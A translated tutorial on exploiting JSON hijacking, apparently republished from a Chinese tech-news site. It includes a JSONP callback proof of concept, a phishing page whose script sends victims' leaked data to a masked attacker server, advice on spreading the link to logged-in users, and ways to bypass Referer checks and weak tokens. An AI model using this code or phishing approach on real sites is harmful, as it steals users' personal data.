2025-01-15 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how JSON Hijacking is exploited in practice. The editor shares it as a reference; I hope you will have a clear understanding of the relevant knowledge after reading it.
Preface
Exploiting a JSON Hijacking vulnerability is somewhat similar to exploiting CSRF, but the underlying principle is different. In this article I focus on how cross-domain JSON hijacking is constructed and carried out.
0x01 Finding the vulnerability
In general, during discovery you search the HTTP history of the Burp Suite proxy and filter out the links that cannot have this vulnerability, as shown in the following figure:
In the JSON-formatted response body we found the following sensitive information (user ID, user name, user mobile number).
0x02 Proof of concept (PoC)
Since the PoC for a submitted vulnerability has to race against the clock in a public bug bounty program, the most concise PoC is used here.
If the returned data is:
    txf({"data": {"name": "Tang Xiaofeng"}})
then the PoC page only needs to define a callback function with the same name, which receives the wrapped data as its argument:
    function txf(a) { alert(a.data.name); }
The resulting pop-up window looks like this:
0x03 Exploitation via phishing
1. Prepare a web server; I set one up directly with phpStudy.
The server-side code is attached below.
json.php, phishing.html:
    <script>
    var xmlhttp;
    // Callback with the same name as the JSONP wrapper; it receives the victim's data
    function txf(a) {
        xmlhttp = new XMLHttpRequest();
        // Forward the leaked field to the attacker-controlled json.php (address masked in the article)
        var x = "http://***.***.***/json.php?name=" + a.data.name;
        xmlhttp.open("GET", x, true);
        xmlhttp.send();
    }
    </script>
2. Phishing the users
Send the phishing link http://***.***.***/phishing.html to users who are logged in to the site (in forums, community QQ groups, community Tieba boards, etc.), and the server receives a large amount of users' sensitive data.
Here is an example from a HackerOne program:
0x04 Fixes and bypasses
Because this example was provided by a friend and has not been fixed yet, it has been anonymized; so let us think about how each fix a developer might apply could be bypassed.
1. Referer whitelist
Sub-domain bypass, filename bypass, empty Referer bypass
2. Adding token authentication
If the token is complex enough, or is encrypted on the server side, we cannot bypass it. If the token is simple, such as pure digits, we can try to enumerate it.
3. Disabling the interface
The invincible fix; it cannot be bypassed.
That is all on how JSON Hijacking is exploited in practice. I hope the above content is of some help to you and that you can learn more from it. If you think the article is good, share it so more people can see it.
© 2024 shulou.com SLNews company. All rights reserved.